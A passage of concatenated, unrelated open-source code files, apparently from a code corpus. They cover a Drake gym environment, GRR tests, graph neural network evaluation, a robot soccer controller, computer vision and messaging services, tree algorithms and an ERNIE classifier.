(plant.GetPositionUpperLimits(), plant.GetVelocityUpperLimits()))
observation_space = gym.spaces.Box(low=np.asarray(low, dtype="float32"),
high=np.asarray(high,
dtype="float32"))
env = DrakeGymEnv(simulator=simulator,
time_step=0.1,
action_space=action_space,
observation_space=observation_space,
reward="reward",
action_port_id="actions",
observation_port_id="observations")
return env
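# Hedged usage sketch (added comment, not from the original file): DrakeGymEnv is
# assumed to follow the classic gym API, so the environment can be driven with the
# usual reset/step loop.
#
#   env = BoxFlipUpEnv(observations="state")
#   obs = env.reset()
#   for _ in range(100):
#       obs, reward, done, info = env.step(env.action_space.sample())
#       if done:
#           obs = env.reset()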
|
the-stack_106_13060
|
#!/usr/bin/env python
"""Tests for grr.server.flows.general.filetypes."""
import os
from grr_response_client.client_actions import plist
from grr.lib import flags
from grr.lib.rdfvalues import paths as rdf_paths
from grr.lib.rdfvalues import plist as rdf_plist
from grr.server import flow
from grr.server.flows.general import filetypes
from grr.test_lib import action_mocks
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class TestPlistFlows(flow_test_lib.FlowTestsBaseclass):
"""Tests the PlistValueFilter flow."""
def _RunFlow(self, flow_name, context=None, query=None):
client_mock = action_mocks.ActionMock(plist.PlistQuery)
request = rdf_plist.PlistRequest(context=context, query=query)
request.pathspec.path = os.path.join(self.base_path, "test.plist")
request.pathspec.pathtype = rdf_paths.PathSpec.PathType.OS
for s in flow_test_lib.TestFlowHelper(
flow_name,
client_mock,
client_id=test_lib.TEST_CLIENT_ID,
token=self.token,
request=request):
session_id = s
return session_id
def _CheckOutput(self, session_id):
results = flow.GRRFlow.ResultCollectionForFID(session_id)
self.assertEqual(len(results), 1)
self.assertEqual(results[0]["nested1"]["nested11"]["key112"], "value112")
def testPlistValueFilter(self):
session_id = self._RunFlow(
filetypes.PlistValueFilter.__name__, context="", query="")
self._CheckOutput(session_id)
def main(argv):
# Run the full test suite
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
the-stack_106_13062
|
import argparse
from tqdm import tqdm
import sys
from sklearn.metrics import f1_score
from pyHGT.data import *
from pyHGT.model import *
from warnings import filterwarnings
filterwarnings("ignore")
import torch
import torch.nn.functional as F
from torch.nn import ModuleList, Linear, ParameterDict, Parameter
from torch_geometric.utils import to_undirected
from torch_geometric.data import Data
from torch_geometric.nn import MessagePassing
from ogb.nodeproppred import PygNodePropPredDataset, Evaluator
parser = argparse.ArgumentParser(description='Training GNN on ogbn-mag benchmark')
parser.add_argument('--data_dir', type=str, default='/datadrive/dataset/OGB_MAG.pk',
help='The address of preprocessed graph.')
parser.add_argument('--model_dir', type=str, default='./hgt_4layer',
help='The address for storing the trained models.')
parser.add_argument('--task_type', type=str, default='variance_reduce',
help='Whether to use variance_reduce evaluation or sequential evaluation')
parser.add_argument('--vr_num', type=int, default=8,
help='Whether to use ensemble evaluation or sequential evaluation')
parser.add_argument('--n_pool', type=int, default=8,
help='Number of process to sample subgraph')
parser.add_argument('--n_batch', type=int, default=32,
help='Number of batch (sampled graphs) for each epoch')
parser.add_argument('--batch_size', type=int, default=128,
help='Number of output nodes for training')
parser.add_argument('--conv_name', type=str, default='hgt',
choices=['hgt', 'gcn', 'gat', 'rgcn', 'han', 'hetgnn'],
help='The name of GNN filter. By default is Heterogeneous Graph Transformer (hgt)')
parser.add_argument('--n_hid', type=int, default=512,
help='Number of hidden dimension')
parser.add_argument('--n_heads', type=int, default=8,
help='Number of attention head')
parser.add_argument('--n_layers', type=int, default=4,
help='Number of GNN layers')
parser.add_argument('--cuda', type=int, default=2,
help='cuda')
parser.add_argument('--dropout', type=float, default=0.2,
help='Dropout ratio')
parser.add_argument('--sample_depth', type=int, default=6,
help='How many layers (hops) deep to sample the subgraph')
parser.add_argument('--sample_width', type=int, default=520,
help='How many nodes to be sampled per layer per type')
parser.add_argument('--prev_norm', help='Whether to add layer-norm on the previous layers', action='store_true')
parser.add_argument('--last_norm', help='Whether to add layer-norm on the last layers', action='store_true')
parser.add_argument('--use_RTE', help='Whether to use RTE', action='store_true')
args = parser.parse_args()
args_print(args)
def ogbn_sample(seed, samp_nodes):
np.random.seed(seed)
ylabel = torch.LongTensor(graph.y[samp_nodes])
feature, times, edge_list, indxs, _ = sample_subgraph(graph, \
inp = {'paper': np.concatenate([samp_nodes, graph.years[samp_nodes]]).reshape(2, -1).transpose()}, \
sampled_depth = args.sample_depth, sampled_number = args.sample_width, \
feature_extractor = feature_MAG)
node_feature, node_type, edge_time, edge_index, edge_type, node_dict, edge_dict = \
to_torch(feature, times, edge_list, graph)
train_mask = graph.train_mask[indxs['paper']]
valid_mask = graph.valid_mask[indxs['paper']]
test_mask = graph.test_mask[indxs['paper']]
ylabel = graph.y[indxs['paper']]
yindxs = indxs['paper'][test_mask]
return node_feature, node_type, edge_time, edge_index, edge_type, (train_mask, valid_mask, test_mask), ylabel, yindxs
def prepare_data(pool, task_type = 'train', s_idx = 0, n_batch = args.n_batch, batch_size = args.batch_size):
'''
    Sample and prepare training and validation data using multi-process parallelization.
'''
jobs = []
if task_type == 'train':
for batch_id in np.arange(n_batch):
p = pool.apply_async(ogbn_sample, args=([randint(), \
np.random.choice(graph.train_paper, args.batch_size, replace = False)]))
jobs.append(p)
elif task_type == 'variance_reduce':
target_papers = graph.test_paper[s_idx * args.batch_size : (s_idx + 1) * args.batch_size]
for batch_id in np.arange(n_batch):
p = pool.apply_async(ogbn_sample, args=([randint(), target_papers]))
jobs.append(p)
elif task_type == 'sequential':
for i in np.arange(n_batch):
target_papers = graph.test_paper[(s_idx + i) * batch_size : (s_idx + i + 1) * batch_size]
p = pool.apply_async(ogbn_sample, args=([randint(), target_papers]))
jobs.append(p)
return jobs
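# Note (a reading of the two evaluation modes above, not original documentation):
# 'variance_reduce' resamples the *same* slice of graph.test_paper args.vr_num
# times so the averaged predictions have lower sampling variance, while
# 'sequential' walks through disjoint batch_size-sized slices of graph.test_paper
# one batch after another.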
graph = dill.load(open(args.data_dir, 'rb'))
np.random.seed(43)
np.random.shuffle(graph.test_paper)
y_preds = {pi : np.zeros(graph.y.max().item()+1) for pi in graph.test_paper}
evaluator = Evaluator(name='ogbn-mag')
device = torch.device("cuda:%d" % args.cuda)
gnn = GNN(conv_name = args.conv_name, in_dim = len(graph.node_feature['paper'][0]), \
n_hid = args.n_hid, n_heads = args.n_heads, n_layers = args.n_layers, dropout = args.dropout,\
num_types = len(graph.get_types()), num_relations = len(graph.get_meta_graph()) + 1,\
prev_norm = args.prev_norm, last_norm = args.last_norm, use_RTE = args.use_RTE)
classifier = Classifier(args.n_hid, graph.y.max().item()+1)
model = nn.Sequential(gnn, classifier)
model.load_state_dict(torch.load(args.model_dir))
model.to(device)
print('Model #Params: %d' % get_n_params(model))
criterion = nn.NLLLoss()
model.eval()
with torch.no_grad():
if args.task_type == 'variance_reduce':
y_pred = []
y_true = []
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'variance_reduce', s_idx = 0, n_batch = args.vr_num)
with tqdm(np.arange(len(graph.test_paper) // args.batch_size + 1) + 1, desc='eval') as monitor:
for s_idx in monitor:
ress = []
test_data = [job.get() for job in jobs]
pool.close()
pool.join()
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'variance_reduce', s_idx = s_idx, n_batch = args.vr_num)
for node_feature, node_type, edge_time, edge_index, edge_type, (train_mask, valid_mask, test_mask), ylabel, yindxs in test_data:
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
res = classifier.forward(node_rep[:args.batch_size])
ress += [res]
res = classifier.forward(node_rep[:len(ylabel)][test_mask])
for pi, r in zip(yindxs, res.tolist()):
y_preds[pi] += r
y_pred += torch.stack(ress).mean(dim=0).argmax(dim=1).tolist()
y_true += list(ylabel[:args.batch_size])
test_acc = evaluator.eval({
'y_true': torch.LongTensor(y_true).unsqueeze(-1),
'y_pred': torch.LongTensor(y_pred).unsqueeze(-1)
})['acc']
monitor.set_postfix(accuracy = test_acc)
elif args.task_type == 'sequential':
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'sequential', s_idx = 0, n_batch = args.n_batch, batch_size=args.batch_size)
with tqdm(np.arange(len(graph.test_paper) // (args.batch_size * args.n_batch) + 1) + 1, desc='eval') as monitor:
for s_idx in monitor:
test_data = [job.get() for job in jobs]
pool.close()
pool.join()
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'sequential', s_idx = int(s_idx * args.n_batch), batch_size=args.batch_size)
for node_feature, node_type, edge_time, edge_index, edge_type, (train_mask, valid_mask, test_mask), ylabel, yindxs in test_data:
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
res = classifier.forward(node_rep[:len(ylabel)][test_mask])
for pi, r in zip(yindxs, res.tolist()):
y_preds[pi] += r
y_pred = []
y_true = []
for pi in y_preds:
y_pred += [y_preds[pi].argmax()]
y_true += [graph.y[pi]]
test_acc = evaluator.eval({
'y_true': torch.LongTensor(y_true).unsqueeze(-1),
'y_pred': torch.LongTensor(y_pred).unsqueeze(-1)
})['acc']
print(test_acc)
|
the-stack_106_13063
|
def extractLotustranslationsWordpressCom(item):
'''
Parser for 'lotustranslations.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
if item['tags'] == ['Announcements']:
return None
tagmap = [
('Xianggong, Please Divorce Me!', 'Xianggong, Please Divorce Me!', 'translated'),
('100% Sweet Love', '100% sweet love: The delinquent XXX wife is a bit sweet', 'translated'),
('Black Bellied President Dotes on Wife', 'Black Bellied President Dotes on Wife', 'translated'),
('icsaytd', 'I Can Still Accompany You Till Dawn', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
the-stack_106_13064
|
# rcj_soccer_player controller - ROBOT Y3
###### REQUIRED in order to import files from Y1 controller
import sys
from pathlib import Path
sys.path.append(str(Path('.').absolute().parent))
# You can now import scripts that you put into the folder with your
# robot B1 controller
from rcj_soccer_player_y1 import rcj_soccer_robot, utils
######
# Feel free to import built-in libraries
import math
class MyRobot(rcj_soccer_robot.RCJSoccerRobot):
def run(self):
while self.robot.step(rcj_soccer_robot.TIME_STEP) != -1:
if self.is_new_data():
data = self.get_new_data()
# Get the position of our robot
robot_pos = data[self.name]
# Get the position of the ball
ball_pos = data['ball']
# Get angle between the robot and the ball
# and between the robot and the north
ball_angle, robot_angle = self.get_angles(ball_pos, robot_pos)
# Compute the speed for motors
direction = utils.get_direction(ball_angle)
# If the robot has the ball right in front of it, go forward,
# rotate otherwise
if direction == 0:
left_speed = -5
right_speed = -5
else:
left_speed = direction * 4
right_speed = direction * -4
# Set the speed to motors
self.left_motor.setVelocity(left_speed)
self.right_motor.setVelocity(right_speed)
my_robot = MyRobot()
my_robot.run()
|
the-stack_106_13065
|
from geographiclib.geodesic import Geodesic
import datetime
import numpy as np
import math
from ast import literal_eval
def get_date_time(row):
##Get datetime object
date = [int(i) for i in literal_eval(row["Date"])]
time = [int(math.floor(float(l))) for l in literal_eval(row["Time"])]
t = datetime.datetime(date[0],date[1],date[2],time[0],time[1],time[2])
return t
def get_range_and_bearing(lat1,lon1,lat2,lon2):
##Get relative range and bearing between two lat/lon points
geod = Geodesic.WGS84
lat2 = float(lat2)
lon2 = float(lon2)
g = geod.Inverse(lat1,lon1,lat2,lon2)
return g['s12']/1000.0, g['azi1']
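# Rough sanity check (illustrative numbers, not surveyed coordinates): at 40 N,
# two points ~0.012 deg of longitude apart lie about 1 km apart due east, so
# get_range_and_bearing(40.0, -79.0, 40.0, -78.988) should return roughly
# (1.02, 90.0) -- range in km, bearing in degrees clockwise from north.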
def get_runway_transform():
##Numbers are hardcoded to KBTP
R1 = [40.774548, -79.959237] ##Runway 08
R2 = [40.778630, -79.942803] ##Runway 26
cam_ref = [ 40.777888, -79.949864] ##setup location
runway_length = 1.45
r1, b1 = get_range_and_bearing(cam_ref[0],cam_ref[1],R1[0],R1[1])
x1 = r1*np.sin(np.deg2rad(b1))
y1 = r1*np.cos(np.deg2rad(b1))
# print(x1,y1)
r2, b2 = get_range_and_bearing(cam_ref[0],cam_ref[1],R2[0],R2[1])
x2 = r2*np.sin(np.deg2rad(b2))
y2 = r2*np.cos(np.deg2rad(b2))
# print(x2,y2)
ang = -np.arctan2(y1-y2,x1-x2)
rot = np.array([[np.cos(ang),-np.sin(ang)],[np.sin(ang),np.cos(ang)]])
    p = rot@np.array([x1,y1])
# print(p)
R = -np.array([[np.cos(ang),-np.sin(ang), p[0]],[np.sin(ang),np.cos(ang),p[1]],[0,0,1]])
return R
def convert_frame(r,b,R):
x = np.multiply(r,np.sin(np.deg2rad(b)))
y = np.multiply(r,np.cos(np.deg2rad(b)))
points = np.matmul(R,np.vstack((x,y,np.ones((np.shape(x))))))
return points[0],points[1]
def feet2kmeter(value):
return float(value)*0.3048/1000.0
if __name__ == '__main__':
R1 = [40.778208, -79.968666]
# R1 = [ 40.777888, -79.949864]
cam_ref = [ 40.777888, -79.949864]
r1, b1 = get_range_and_bearing(cam_ref[0],cam_ref[1],R1[0],R1[1])
R = get_runway_transform()
print(convert_frame(r1,b1,R))
|
the-stack_106_13066
|
from socket import AF_INET, SOCK_STREAM, socket, SOL_SOCKET, SO_REUSEADDR
#from threading import Thread
from multiprocessing import Process
def echo_server(address):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, True)
sock.bind(address)
sock.listen(1)
while True:
client, addr = sock.accept()
#echo_handler(client, addr)
#Thread(target=echo_handler, args=(client, addr)).start()
Process(target=echo_handler, args=(client, addr)).start()
def echo_handler(client, addr):
print("Connection from", addr)
    with client:
        while True:
            data = client.recv(100_000)
            if not data:
                break
            client.sendall(data)
print("Connection closed")
echo_server(('', 25000))
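# Quick manual check (assumes a shell with netcat available):
#   $ nc localhost 25000
# Anything typed is echoed back. Each accepted connection is served by its own
# Process, which is why the Thread import above is left commented out.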
|
the-stack_106_13067
|
_base_ = [
'../_base_/models/retinanet_r50_fpn.py',
'../_base_/datasets/coco_detection.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
backbone=dict(
frozen_stages=-1,
norm_cfg=dict(type='SyncBN', requires_grad=True)),
neck=dict(
norm_cfg=dict(type='SyncBN', requires_grad=True)),
bbox_head=dict(
norm_cfg=dict(type='SyncBN', requires_grad=True))
)
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
|
the-stack_106_13068
|
#
# @author:charlotte.Song
# @file: yolact_neck.py
# @Date: 2019/9/17 11:53
# @description:
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import xavier_init
from mmdet.core import auto_fp16
from ..registry import NECKS
from ..utils import ConvModule
@NECKS.register_module
class YolactFPNPlus(nn.Module):
"""a FPN-like structure, produces proto map
and feature maps at the same time.
"""
def __init__(self,
in_channels,
in_embeds,
out_channels,
num_outs,
stacked_convs=3,
upsample_ratio=2,
start_level=0,
end_level=-1,
add_extra_convs=False,
extra_convs_on_inputs=True,
relu_before_extra_convs=False,
no_norm_on_lateral=False,
conv_cfg=None,
norm_cfg=None,
activation=None):
super(YolactFPNPlus, self).__init__()
assert isinstance(in_channels, list)
self.in_channels = in_channels
self.in_embeds = in_embeds
self.out_channels = out_channels
self.num_ins = len(in_channels)
self.num_outs = num_outs
self.stacked_convs = stacked_convs
self.upsample_ratio = upsample_ratio
self.activation = activation
self.relu_before_extra_convs = relu_before_extra_convs
self.no_norm_on_lateral = no_norm_on_lateral
self.fp16_enabled = False
if end_level == -1:
self.backbone_end_level = self.num_ins
assert num_outs >= self.num_ins - start_level
else:
# if end_level < inputs, no extra level is allowed
self.backbone_end_level = end_level
assert end_level <= len(in_channels)
assert num_outs == end_level - start_level
self.start_level = start_level
self.end_level = end_level
self.add_extra_convs = add_extra_convs
self.extra_convs_on_inputs = extra_convs_on_inputs
self.lateral_convs = nn.ModuleList()
self.fpn_convs = nn.ModuleList()
for i in range(self.start_level, self.backbone_end_level):
l_conv = ConvModule(
in_channels[i],
out_channels,
1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg if not self.no_norm_on_lateral else None,
activation=self.activation,
inplace=False)
fpn_conv = ConvModule(
out_channels,
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
self.lateral_convs.append(l_conv)
self.fpn_convs.append(fpn_conv)
# add convs for proto masks.
self.proto_convs = nn.ModuleList()
for i in range(self.stacked_convs):
self.proto_convs.append(
ConvModule(
out_channels,
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False))
self.smooth_conv = ConvModule(
in_channels[0],
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
self.proto_smooth_conv = ConvModule(
out_channels,
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
# add extra conv layers (e.g., RetinaNet)
extra_levels = num_outs - self.backbone_end_level + self.start_level
if add_extra_convs and extra_levels >= 1:
for i in range(extra_levels):
if i == 0 and self.extra_convs_on_inputs:
in_channels = self.in_channels[self.backbone_end_level - 1]
else:
in_channels = out_channels
extra_fpn_conv = ConvModule(
in_channels,
out_channels,
3,
stride=2,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
self.fpn_convs.append(extra_fpn_conv)
self.proto_up = nn.Upsample(
scale_factor=self.upsample_ratio, mode='bilinear')
self.proto_logits = nn.Conv2d(out_channels, self.in_embeds, 1)
self.relu = nn.ReLU(inplace=True)
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
xavier_init(m, distribution='uniform')
@auto_fp16()
def forward(self, inputs):
assert len(inputs) == len(self.in_channels)
# build laterals
laterals = [
lateral_conv(inputs[i + self.start_level])
for i, lateral_conv in enumerate(self.lateral_convs)
]
# build top-down path
used_backbone_levels = len(laterals)
for i in range(used_backbone_levels - 1, 0, -1):
laterals[i - 1] += F.interpolate(
laterals[i], scale_factor=2, mode='nearest')
# build outputs
# part 1: from original levels
outs = [
self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels)
]
# part 2: add extra levels
if self.num_outs > len(outs):
# use max pool to get more levels on top of outputs
# (e.g., Faster R-CNN, Mask R-CNN)
if not self.add_extra_convs:
for i in range(self.num_outs - used_backbone_levels):
outs.append(F.max_pool2d(outs[-1], 1, stride=2))
# add conv layers on top of original feature maps (RetinaNet)
else:
if self.extra_convs_on_inputs:
orig = inputs[self.backbone_end_level - 1]
outs.append(self.fpn_convs[used_backbone_levels](orig))
else:
outs.append(self.fpn_convs[used_backbone_levels](outs[-1]))
for i in range(used_backbone_levels + 1, self.num_outs):
if self.relu_before_extra_convs:
outs.append(self.fpn_convs[i](F.relu(outs[-1])))
else:
outs.append(self.fpn_convs[i](outs[-1]))
# produce proto_masks.
proto_feat = outs[0].clone()
for proto_conv in self.proto_convs:
proto_feat = proto_conv(proto_feat)
proto_feat = self.proto_up(proto_feat)
proto_lateral = inputs[0].clone()
proto_lateral = self.smooth_conv(proto_lateral)
proto_feat = proto_lateral + proto_feat
proto_feat = self.proto_smooth_conv(proto_feat)
proto_mask = self.proto_logits(proto_feat)
proto_mask = self.relu(proto_mask)
return proto_mask, tuple(outs)
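# Reading of forward() above (added note): it returns (proto_mask, outs). The
# proto mask is built from the finest FPN output, run through the proto convs,
# upsampled by upsample_ratio, fused with a smoothed copy of the first backbone
# feature map (inputs[0]) and projected to in_embeds channels; outs are the
# usual FPN pyramid levels used by the detection head.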
|
the-stack_106_13069
|
import cv2
import handTrackingModule as htm
import time
cam = cv2.VideoCapture(0)
########
widthimg = 1280
heightimg = 1280
#######
cam.set(3,widthimg)
cam.set(4,heightimg)
#########
########
ctime = 0
ptime = 0
#####
detector = htm.handDetector()
########
options = ['Face', 'Hands', 'UpperB' , 'LowerB','Stop']
big_box_height = 85
hi_box = 30
hf_box = 75
box_width = 150
start_points = []
end_points =[]
point = 0
end_point = 0
for i in range(5) :
if i == 0 :
point = 10
end_point = point + box_width
else:
point = end_points[i-1] + 20
end_point = point + box_width
start_points.append(point)
end_points.append(end_point)
#########
def add_options(img , widthimg, heightimg) :
cv2.rectangle(img,(0,0),(widthimg,big_box_height),(255,255,255) , cv2.FILLED)
cv2.putText(img,"Make Invisible: ",(5,15),cv2.FONT_HERSHEY_COMPLEX_SMALL,1,(255,0,0),2)
for i in range(len(options)) :
if i==len(options)-1 :
point = widthimg-160
cv2.rectangle(img, (point, hi_box), (point+150, hf_box), (200, 200, 200), cv2.FILLED)
cv2.putText(img, options[i], (point + 25, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 50, 250), 2)
else:
cv2.rectangle(img,(start_points[i],hi_box),(end_points[i],hf_box),(200,200,200),cv2.FILLED)
cv2.putText(img,options[i],(start_points[i]+25,60),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,150,250),2)
#cv2.rectangle(img,(start_points[1],hi_box),(end_points[1],hf_box),(200,200,200),cv2.FILLED)
#cv2.putText(img, 'Face', (45, 70), cv2.FONT_HERSHEY_SIMPLEX, 1, (150, 0, 0), 2)
while True:
res, frame = cam.read()
frame = cv2.flip(frame, 1)
img = detector.findHands(frame)
add_options(frame, widthimg, heightimg)
lmslist = detector.findPosition(img)
#print(lmslist)
# --FpS--
ctime = time.time()
fps = 1 // (ctime - ptime)
ptime = ctime
cv2.putText(frame, str(int(fps)), (frame.shape[1] - 100, frame.shape[0] - 25), cv2.FONT_HERSHEY_TRIPLEX, 2,
(0, 255, 0), 2)
cv2.imshow('Hand Tracker', img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cam.release()
cv2.destroyAllWindows()
|
the-stack_106_13070
|
import os
import signal
import asyncio
from nats.aio.client import Client as Nats
import edgefarm_application as ef
from edgefarm_application.base.avro import schemaless_decode
from edgefarm_application.base.schema import schema_load_builtin
from edgefarm_application.base.avro import schemaless_encode
nc = None
nats_topic = "pis.seatRes"
async def nats_handler(msg):
"""Receive nats messages here."""
# Decode received message
seat_info_request = schemaless_decode(
msg.data, schema_load_builtin(__file__, "../schemas/seat_info_request")
)
train = seat_info_request["train"]
print("Train ID: " + train)
# Prepare seat info data
seat_info_response = {
"seatReservations": [
{"id": 0, "startStation": "Nürnberg", "endStation": "München"},
{"id": 2, "startStation": "Erlangen", "endStation": "Frankf."},
{"id": 5, "startStation": "Köln", "endStation": "Berlin"},
]
}
print("Seat Info: " + str(seat_info_response))
resp_byte = schemaless_encode(
seat_info_response,
schema_load_builtin(__file__, "../schemas/seat_info_response"),
)
# Reply seat info data
await nc.publish(msg.reply, resp_byte)
async def main():
global nc
loop = asyncio.get_event_loop()
# Initialize EdgeFarm SDK
await ef.application_module_init(loop, "", "", "")
#
# Connect to NATS and subscribe to "service.location" subject
#
nc = Nats()
nats_server = os.getenv("NATS_SERVER", "nats:4222")
await nc.connect(servers="nats://" + nats_server, loop=loop)
print("NATS connect ok")
subscription_id = await nc.subscribe(nats_topic, cb=nats_handler)
#
# The following shuts down gracefully when SIGINT or SIGTERM is received
#
stop = {"stop": False}
def signal_handler():
stop["stop"] = True
for sig in ("SIGINT", "SIGTERM"):
loop.add_signal_handler(getattr(signal, sig), signal_handler)
while not stop["stop"]:
await asyncio.sleep(1)
print("Unsubscribing and shutting down...")
await nc.unsubscribe(subscription_id)
await nc.close()
await ef.application_module_term()
if __name__ == "__main__":
asyncio.run(main())
|
the-stack_106_13071
|
#!/usr/bin/env python
import logging
import os
from gi.repository import Gdk, Gtk
from gaphor.abc import ActionProvider
from gaphor.action import action
from gaphor.plugins.console.console import GTKInterpreterConsole
from gaphor.services.properties import get_config_dir
from gaphor.ui.abc import UIComponent
log = logging.getLogger(__name__)
class ConsoleWindow(UIComponent, ActionProvider):
title = "Gaphor Console"
size = (400, 400)
def __init__(self, component_registry, main_window, tools_menu):
self.component_registry = component_registry
self.main_window = main_window
tools_menu.add_actions(self)
self.window = None
def load_console_py(self, console):
"""Load default script for console.
Saves some repetitive typing.
"""
console_py = os.path.join(get_config_dir(), "console.py")
try:
with open(console_py) as f:
for line in f:
console.push(line)
except OSError:
log.info(f"No initiation script {console_py}")
@action(name="console-window-open", label="_Console")
def open_console(self):
if not self.window:
self.open()
else:
self.window.set_property("has-focus", True)
def open(self):
console = self.construct()
self.load_console_py(console)
def close(self, widget=None):
if self.window:
self.window.destroy()
self.window = None
def construct(self):
window = Gtk.Window.new(Gtk.WindowType.TOPLEVEL)
window.set_transient_for(self.main_window.window)
window.set_title(self.title)
console = GTKInterpreterConsole(
locals={"service": self.component_registry.get_service}
)
console.show()
window.add(console)
window.show()
self.window = window
def key_event(widget, event):
if (
event.keyval == Gdk.KEY_d
and event.get_state() & Gdk.ModifierType.CONTROL_MASK
):
window.destroy()
return False
window.connect("key_press_event", key_event)
window.connect("destroy", self.close)
return console
|
the-stack_106_13072
|
from Tree.BinaryTree.BinaryTree import BinaryTree, BinaryTreeNode
from Utils.Array import input_array
"""
LeetCode : https://leetcode.com/problems/diameter-of-binary-tree/
GFG: https://www.geeksforgeeks.org/diameter-of-a-binary-tree/
"""
diameter = 0
def find_depth(root: BinaryTreeNode) -> int:
if root is None:
return 0
left_depth = find_depth(root.left)
right_depth = find_depth(root.right)
return max(left_depth, right_depth) + 1 # maximum_depth
def diameter_of_binary_tree(root: BinaryTreeNode) -> int:
if root is None:
return 0
left_child_diameter = diameter_of_binary_tree(root.left)
right_child_diameter = diameter_of_binary_tree(root.right)
# current node's diameter
left_depth = find_depth(root.left)
right_depth = find_depth(root.right)
curr_node_diameter = left_depth + right_depth
return max(curr_node_diameter, left_child_diameter, right_child_diameter)
if __name__ == '__main__':
tree_input = input_array(prompt="")
root = BinaryTree.single_line_input(tree_input)
BinaryTree.display(root)
print("diameter : ", diameter_of_binary_tree(root))
"""
1
/ \
2 3
/ \
4 5
1 2 3 4 5 -1 -1 -1 -1 -1 -1
"""
"""
0
/ \
1 2
/ \
3 4
/ \
5 6
\
7
0 1 2 3 4 -1 -1 5 -1 -1 6 -1 -1 -1 7 -1 -1
"""
|
the-stack_106_13073
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model for classifier."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import time
import logging
import numpy as np
from scipy.stats import pearsonr, spearmanr
from six.moves import xrange
import paddle.fluid as fluid
from ernie.classification.model.ernie import ErnieModel
log = logging.getLogger(__name__)
def create_model(args,
pyreader_name,
ernie_config,
is_prediction=False,
task_name="",
is_classify=False,
is_regression=False,
ernie_version="1.0"):
src_ids = fluid.layers.data(name='eval_placeholder_0', shape=[-1, args.max_seq_len, 1], dtype='int64')
sent_ids = fluid.layers.data(name='eval_placeholder_1', shape=[-1, args.max_seq_len, 1], dtype='int64')
pos_ids = fluid.layers.data(name='eval_placeholder_2', shape=[-1, args.max_seq_len, 1], dtype='int64')
input_mask = fluid.layers.data(name='eval_placeholder_3', shape=[-1, args.max_seq_len, 1], dtype='float32')
task_ids = fluid.layers.data(name='eval_placeholder_4', shape=[-1, args.max_seq_len, 1], dtype='int64')
qids = fluid.layers.data(name='eval_placeholder_5', shape=[-1, 1], dtype='int64')
if is_classify:
labels = fluid.layers.data(name='6', shape=[-1, 1], dtype='int64')
elif is_regression:
labels = fluid.layers.data(name='6', shape=[-1, 1], dtype='float32')
pyreader = fluid.io.DataLoader.from_generator(feed_list=[src_ids, sent_ids, pos_ids, task_ids, input_mask, labels, qids],
capacity=70,
iterable=False)
ernie = ErnieModel(
src_ids=src_ids,
position_ids=pos_ids,
sentence_ids=sent_ids,
task_ids=task_ids,
input_mask=input_mask,
config=ernie_config,
use_fp16=args.use_fp16)
cls_feats = ernie.get_pooled_output()
cls_feats = fluid.layers.dropout(
x=cls_feats,
dropout_prob=0.1,
dropout_implementation="upscale_in_train")
logits = fluid.layers.fc(
input=cls_feats,
size=args.num_labels,
param_attr=fluid.ParamAttr(
name=task_name + "_cls_out_w",
initializer=fluid.initializer.TruncatedNormal(scale=0.02)),
bias_attr=fluid.ParamAttr(
name=task_name + "_cls_out_b",
initializer=fluid.initializer.Constant(0.)))
assert is_classify != is_regression, 'is_classify or is_regression must be true and only one of them can be true'
if is_prediction:
if is_classify:
probs = fluid.layers.softmax(logits)
else:
probs = logits
feed_targets_name = [
src_ids.name, sent_ids.name, pos_ids.name, input_mask.name
]
if ernie_version == "2.0":
feed_targets_name += [task_ids.name]
return pyreader, probs, feed_targets_name
num_seqs = fluid.layers.create_tensor(dtype='int64')
if is_classify:
ce_loss, probs = fluid.layers.softmax_with_cross_entropy(
logits=logits, label=labels, return_softmax=True)
loss = fluid.layers.mean(x=ce_loss)
accuracy = fluid.layers.accuracy(
input=probs, label=labels, total=num_seqs)
graph_vars = {
"loss": loss,
